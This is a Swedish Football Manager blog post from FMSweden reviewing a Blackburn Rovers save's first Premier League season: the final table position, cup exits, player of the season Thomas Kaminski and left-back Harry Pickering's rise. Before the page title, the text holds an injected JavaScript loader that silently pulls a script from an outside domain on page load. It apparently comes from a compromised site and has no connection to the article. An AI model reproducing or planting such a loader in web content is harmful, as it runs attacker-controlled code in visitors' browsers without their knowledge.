;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – (Blackburn Rovers) Premier League football – FMSweden
Meny Stäng

Start of the week – (Blackburn Rovers) Premier League football

Första säsongen i Premier League är färdigspelad och det blev på många sätt en lyckad sådan. Den började på ett helt sjukt sätt där vi manglade Chelsea hemma på Ewood Park och Adam Armstrong satte ton för en säsong som nästan bar hela vägen till vinst i skytteligan.

Efter en briljant start av laget där vi chockade många av lagen med en hänsynslös press och ett respektlöst sätt att ta oss an matcherna så kom verkligheten ikapp och vi hade i stora stunder det väldigt tufft. När strecket närmade sig och det såg ut som att vi kanske kunde bli inblandade i en nedflyttningsstrid trots allt så ryckte gubbarna upp sig på nytt och det var i ärlighetens namn aldrig nära att vi åkte ur. I stort en svajig säsong med otroligt höga toppar men också djupa dalar. Att vi slutar på en 13:e plats utan något större drama och på så sätt etablerar oss som ett Premier League lag redan första säsongen är ett styrkebesked från Blackburn Rovers.

Premier League: 13:e plats 43p

EFL Cup: Ut i omgång 4 mot Manchester United

FA Cupen: Ut i omgång 3 mot Swansea

Säsongens spelare:

Thomas Kaminski. Den belgiske målvakten som i min mening är hela ligans bästa spelare den här säsongen avslutar säsongen med ett snittbetyg på 7.27 vilket var nionde bäst i hela ligan och han är målvakt som sagt. En säsong som ledde hela vägen till landslaget för Thomas Kaminski.

Säsongens match:

Utan tvivel är det när vi i premiären fullständigt läxar upp Chelsea under 90 minuter i premiären. Total slakt.

Säsongens saga:

Säsongen 20–21 spelar Harry Pickering på lån i Crewe nere i League One. Det är inte från någon braksuccé han kommer tillbaka till Blackburn. Ett Blackburn som satsade mot Premier League och vi valde att satsa på en vänsterback som säsongen innan spelat i League One. En av dem viktigare kuggarna när Blackburn gick upp till Premier League blev vänsterbacken, Harry Pickering. I Blackburns comeback-säsong i Premier League gör han 10 assist på 34 matcher och når ett snittbetyg på 7.05. League One till Premier League på 3 år. Säsongens saga.

Motivationen att spela FM är just nu tyvärr låg och vi tar därför en paus med Blackburn Rovers. Vi tog oss tillbaka till Premier League. Vi gjorde en bra första säsong. Saven finns kvar ifall motivationen hittar tillbaka till just det här projektet men för nu så pausar vi rapporten om Blackburn.

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar